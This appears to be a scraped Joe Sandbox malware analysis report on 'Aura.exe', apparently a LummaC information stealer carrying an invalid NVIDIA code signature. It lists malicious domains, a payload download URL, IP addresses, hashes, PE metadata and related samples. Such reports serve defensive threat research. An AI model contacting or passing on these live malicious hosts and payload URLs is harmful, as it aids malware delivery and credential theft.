                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgAura.exe, 00000002.00000003.1816553901.0000000005B2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoAura.exe, 00000002.00000003.1767549116.0000000005B69000.00000004.00000800.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1766979070.0000000005B6B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&aAura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=englAura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              https://lev-tolstoi.com/api1Aura.exe, 00000002.00000002.3511433189.00000000033F4000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.2531562354.00000000033F2000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.2531148527.00000000033D5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              http://aia.entrust.net/ts1-chain256.cer01Aura.exefalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                http://147.45.47.81/conhost.exeSAura.exe, 00000002.00000002.3511215128.000000000336C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                • 75% < No. of IPs
                                                                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                104.21.66.86
                                                                                                                                                                                                                                lev-tolstoi.comUnited States
                                                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                23.55.153.106
                                                                                                                                                                                                                                steamcommunity.comUnited States
                                                                                                                                                                                                                                20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                Analysis ID:1581514
                                                                                                                                                                                                                                Start date and time:2024-12-27 23:46:32 +01:00
                                                                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                Overall analysis duration:0h 6m 27s
                                                                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                Report type:full
                                                                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                Run name:Run with higher sleep bypass
                                                                                                                                                                                                                                Number of analysed new started processes analysed:7
                                                                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                                                                Sample name:Aura.exe
                                                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                                                Classification:mal100.troj.spyw.evad.winEXE@4/1@11/2
                                                                                                                                                                                                                                EGA Information:
                                                                                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                                                                                HCA Information:
                                                                                                                                                                                                                                • Successful, ratio: 97%
                                                                                                                                                                                                                                • Number of executed functions: 59
                                                                                                                                                                                                                                • Number of non-executed functions: 148
                                                                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                                                                                                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                                                                                                                                                • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                                                                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63
                                                                                                                                                                                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                • VT rate limit hit for: Aura.exe
                                                                                                                                                                                                                                No simulations
                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                104.21.66.86MV ROCKET_PDA.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                • www.ayushigangwar.com/nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=59bmqUDXor7TXV4b71NCQ0d0nCVif23i1yH5+9ZmJc5hgCU7y+ZN9z0btTsWzGv6OrGw
                                                                                                                                                                                                                                23.55.153.106Installer.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    w22319us3M.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                      T4qO1i2Jav.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                        FXdg37pY22.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                          FXdg37pY22.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                            k0ukcEH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              5uVReRlvME.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, StealcBrowse
                                                                                                                                                                                                                                                8WRONDszv4.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, zgRATBrowse
                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                  lev-tolstoi.comInstaller.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                  SoftWare(1).exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                  ForcesLangi.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                  Leside-.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                  Vq50tK1Nx2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                  IzDjbVdHha.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                                  T4qO1i2Jav.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                                  FXdg37pY22.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                  k0ukcEH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                                  pVbAZEFIpI.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                                  steamcommunity.comInstaller.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  Installer.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.121.10.34
                                                                                                                                                                                                                                                  SoftWare(1).exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                                                  ForcesLangi.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 92.122.104.90
                                                                                                                                                                                                                                                  Leside-.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 92.122.104.90
                                                                                                                                                                                                                                                  Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 104.121.10.34
                                                                                                                                                                                                                                                  Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  Vq50tK1Nx2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.121.10.34
                                                                                                                                                                                                                                                  IzDjbVdHha.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.121.10.34
                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                  AKAMAI-ASN1EUInstaller.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  w22319us3M.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  T4qO1i2Jav.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  FXdg37pY22.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  FXdg37pY22.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  grand-theft-auto-5-theme-1-installer_qb8W-j1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 184.85.182.130
                                                                                                                                                                                                                                                  k0ukcEH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  5uVReRlvME.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, StealcBrowse
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  CLOUDFLARENETUSsoft 1.14.exeGet hashmaliciousMeduza StealerBrowse
                                                                                                                                                                                                                                                  • 104.26.13.205
                                                                                                                                                                                                                                                  Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.21.30.13
                                                                                                                                                                                                                                                  https://www.dropbox.com/scl/fi/lncgsm76k7l5ix7fuu5t6/2024-OK-House-Outreach.pdf?rlkey=o4qr50zpdw1z14o6ikdg6zjt8&st=lrloyzlo&dl=0Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 172.67.216.74
                                                                                                                                                                                                                                                  New Upd v1.1.0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.21.92.91
                                                                                                                                                                                                                                                  WonderHack.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.21.30.13
                                                                                                                                                                                                                                                  Installer.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                  phish_alert_iocp_v1.4.48 - 2024-12-27T140703.193.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 104.18.11.207
                                                                                                                                                                                                                                                  SoftWare(1).exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                  SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                                                                                                                                                                                                  • 104.21.73.97
                                                                                                                                                                                                                                                  NewSetup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 172.67.157.249
                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                  a0e9f5d64349fb13191bc781f81f42e1Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  New Upd v1.1.0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  WonderHack.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  Installer.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  Installer.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  SoftWare(1).exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  NewSetup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  ForcesLangi.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  iviewers.dllGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  No context
                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Aura.exe
                                                                                                                                                                                                                                                  File Type:assembler source, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):14402
                                                                                                                                                                                                                                                  Entropy (8bit):4.874636730022465
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:vlICCmV5fTMzsM3qlICCmV5fTMzsM3ip9guFx2rBhiLfmfU:vGCC+dMOGCC+dMY9guFx2rBo
                                                                                                                                                                                                                                                  MD5:DF0EFD0545733561C6E165770FB3661C
                                                                                                                                                                                                                                                  SHA1:0F3AD477176CF235C6C59EE2EB15D81DCB6178A8
                                                                                                                                                                                                                                                  SHA-256:A434B406E97A2C892FA88C3975D8181EBEA62A8DA919C5221409E425DF50FD17
                                                                                                                                                                                                                                                  SHA-512:3FF527435BC8BCF2640E0B64725CC0DB8A801D912698D4D94C44200529268B80AA7B59A2E2A2EA6C4621E09AA249AAA3583A8D90E4F5D7B68E0E6FFFEB759918
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                                                                                                                  Preview:AcquireSRWLockExclusive..AcquireSRWLockShared..ActivateActCtx..ActivateActCtxWorker..AddAtomA..AddAtomW..AddConsoleAliasA..AddConsoleAliasW..AddDllDirectory..AddIntegrityLabelToBoundaryDescriptor..AddLocalAlternateComputerNameA..AddLocalAlternateComputerNameW..AddRefActCtx..AddRefActCtxWorker..AddResourceAttributeAce..AddSIDToBoundaryDescriptor..AddScopedPolicyIDAce..AddSecureMemoryCacheCallback..AddVectoredContinueHandler..AddVectoredExceptionHandler..AdjustCalendarDate..AllocConsole..AllocateUserPhysicalPages..AllocateUserPhysicalPagesNuma..AppPolicyGetClrCompat..AppPolicyGetCreateFileAccess..AppPolicyGetLifecycleManagement..AppPolicyGetMediaFoundationCodecLoading..AppPolicyGetProcessTerminationMethod..AppPolicyGetShowDeveloperDiagnostic..AppPolicyGetThreadInitializationType..AppPolicyGetWindowingModel..AppXGetOSMaxVersionTested..ApplicationRecoveryFinished..ApplicationRecoveryInProgress..AreFileApisANSI..AssignProcessToJobObject..AttachConsole..BackupRead..BackupSeek..BackupWrite..B
                                                                                                                                                                                                                                                  File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Entropy (8bit):7.5671669193870175
                                                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                  File name:Aura.exe
                                                                                                                                                                                                                                                  File size:569'384 bytes
                                                                                                                                                                                                                                                  MD5:fd5fba5d5bef2952443b96241ffa5814
                                                                                                                                                                                                                                                  SHA1:c6613e363bec49bdf5eb98ccf0f4ee85615cad29
                                                                                                                                                                                                                                                  SHA256:08205d107a6b14818a12e3c8e30c3c7c3300e439359dfc0c99ed026815deca41
                                                                                                                                                                                                                                                  SHA512:c05d7da1000551a91ca7542bdd9a837d99563bf3eab7a98d2ced77be9c171f4f20daa78e1f3dbf577bd6e2d3860bb1c9482ee5e9f5f2539056cc902c63d05f7f
                                                                                                                                                                                                                                                  SSDEEP:12288:mYO6Dqzihouxpa+yWZ+QDKn5zXex8moYjG60VsZy/zQQYBqEO:fO6DThou2+y6b0o8moYy6SsZybvMqt
                                                                                                                                                                                                                                                  TLSH:BDC4E0423691C4B3C953157699B9D779493EBC200F615ACB93A80BFECEB02C15F31A5E
                                                                                                                                                                                                                                                  File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....ng..........................................@.......................................@.................................|j..<..
                                                                                                                                                                                                                                                  Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                                                                  Entrypoint:0x4104a0
                                                                                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                                                                                  Digitally signed:true
                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                  Subsystem:windows cui
                                                                                                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                  Time Stamp:0x676E98E6 [Fri Dec 27 12:09:10 2024 UTC]
                                                                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                                                                  OS Version Major:6
                                                                                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                                                                                  File Version Major:6
                                                                                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                                                                                  Subsystem Version Major:6
                                                                                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                                                                                  Import Hash:96d90e8808da099bc17e050394f447e7
                                                                                                                                                                                                                                                  Signature Valid:false
                                                                                                                                                                                                                                                  Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                                                                                                                                  Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                                  Error Number:-2146869232
                                                                                                                                                                                                                                                  Not Before, Not After
                                                                                                                                                                                                                                                  • 12/01/2023 19:00:00 16/01/2026 18:59:59
                                                                                                                                                                                                                                                  Subject Chain
                                                                                                                                                                                                                                                  • CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
                                                                                                                                                                                                                                                  Version:3
                                                                                                                                                                                                                                                  Thumbprint MD5:5F1B6B6C408DB2B4D60BAA489E9A0E5A
                                                                                                                                                                                                                                                  Thumbprint SHA-1:15F760D82C79D22446CC7D4806540BF632B1E104
                                                                                                                                                                                                                                                  Thumbprint SHA-256:28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
                                                                                                                                                                                                                                                  Serial:0997C56CAA59055394D9A9CDB8BEEB56
                                                                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                                                                  call 00007FAD147D6D0Ah
                                                                                                                                                                                                                                                  jmp 00007FAD147D6B6Dh
                                                                                                                                                                                                                                                  mov ecx, dword ptr [0043B680h]
                                                                                                                                                                                                                                                  push esi
                                                                                                                                                                                                                                                  push edi
                                                                                                                                                                                                                                                  mov edi, BB40E64Eh
                                                                                                                                                                                                                                                  mov esi, FFFF0000h
                                                                                                                                                                                                                                                  cmp ecx, edi
                                                                                                                                                                                                                                                  je 00007FAD147D6D06h
                                                                                                                                                                                                                                                  test esi, ecx
                                                                                                                                                                                                                                                  jne 00007FAD147D6D28h
                                                                                                                                                                                                                                                  call 00007FAD147D6D31h
                                                                                                                                                                                                                                                  mov ecx, eax
                                                                                                                                                                                                                                                  cmp ecx, edi
                                                                                                                                                                                                                                                  jne 00007FAD147D6D09h
                                                                                                                                                                                                                                                  mov ecx, BB40E64Fh
                                                                                                                                                                                                                                                  jmp 00007FAD147D6D10h
                                                                                                                                                                                                                                                  test esi, ecx
                                                                                                                                                                                                                                                  jne 00007FAD147D6D0Ch
                                                                                                                                                                                                                                                  or eax, 00004711h
                                                                                                                                                                                                                                                  shl eax, 10h
                                                                                                                                                                                                                                                  or ecx, eax
                                                                                                                                                                                                                                                  mov dword ptr [0043B680h], ecx
                                                                                                                                                                                                                                                  not ecx
                                                                                                                                                                                                                                                  pop edi
                                                                                                                                                                                                                                                  mov dword ptr [0043B6C0h], ecx
                                                                                                                                                                                                                                                  pop esi
                                                                                                                                                                                                                                                  ret
                                                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                                                                                                  sub esp, 14h
                                                                                                                                                                                                                                                  lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                                                                                  xorps xmm0, xmm0
                                                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                                                  movlpd qword ptr [ebp-0Ch], xmm0
                                                                                                                                                                                                                                                  call dword ptr [00436D00h]
                                                                                                                                                                                                                                                  mov eax, dword ptr [ebp-08h]
                                                                                                                                                                                                                                                  xor eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                                                                                  mov dword ptr [ebp-04h], eax
                                                                                                                                                                                                                                                  call dword ptr [00436CB8h]
                                                                                                                                                                                                                                                  xor dword ptr [ebp-04h], eax
                                                                                                                                                                                                                                                  call dword ptr [00436CB4h]
                                                                                                                                                                                                                                                  xor dword ptr [ebp-04h], eax
                                                                                                                                                                                                                                                  lea eax, dword ptr [ebp-14h]
                                                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                                                  call dword ptr [00436D50h]
                                                                                                                                                                                                                                                  mov eax, dword ptr [ebp-10h]
                                                                                                                                                                                                                                                  lea ecx, dword ptr [ebp-04h]
                                                                                                                                                                                                                                                  xor eax, dword ptr [ebp-14h]
                                                                                                                                                                                                                                                  xor eax, dword ptr [ebp-04h]
                                                                                                                                                                                                                                                  xor eax, ecx
                                                                                                                                                                                                                                                  leave
                                                                                                                                                                                                                                                  ret
                                                                                                                                                                                                                                                  mov eax, 00004000h
                                                                                                                                                                                                                                                  ret
                                                                                                                                                                                                                                                  push 0043CF48h
                                                                                                                                                                                                                                                  call dword ptr [00436D28h]
                                                                                                                                                                                                                                                  ret
                                                                                                                                                                                                                                                  push 00030000h
                                                                                                                                                                                                                                                  push 00010000h
                                                                                                                                                                                                                                                  push 00000000h
                                                                                                                                                                                                                                                  call 00007FAD147DDAE3h
                                                                                                                                                                                                                                                  add esp, 0Ch
                                                                                                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x36a7c0x3c.rdata
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x8e0000x3fc.rsrc
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x88a000x2628.bss
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x3f0000x2744.reloc
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x326080x18.rdata
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2ea980xc0.rdata
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x36c3c0x184.rdata
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                  .text0x10000x2b4ca0x2b600ebf84c6b836020b1a66433a898baeab7False0.5443702719740634data6.596404756541432IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                  .rdata0x2d0000xc50c0xc60096e76e7ef084461591b1dcd4c2131f05False0.40260022095959597data4.741850626178578IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                  .data0x3a0000x37140x2800d87fd4546a2b39263a028b496b33108fFalse0.29814453125data5.024681407682101IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                  .tls0x3e0000x90x2001f354d76203061bfdd5a53dae48d5435False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                  .reloc0x3f0000x27440x2800c7508b57e36483307c47b7dd73fc0c85False0.75166015625data6.531416896423856IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                  .bss0x420000x4b2000x4b200819c6c38226d2bfad799df898d1785bcFalse1.0003282289933444data7.999409219617241IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                  .rsrc0x8e0000x3fc0x4004243bfa36d7c6187562be2edfa0b46c2False0.443359375data3.391431520369637IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                  RT_VERSION0x8e0580x3a4dataEnglishUnited States0.44849785407725323
                                                                                                                                                                                                                                                  DLLImport
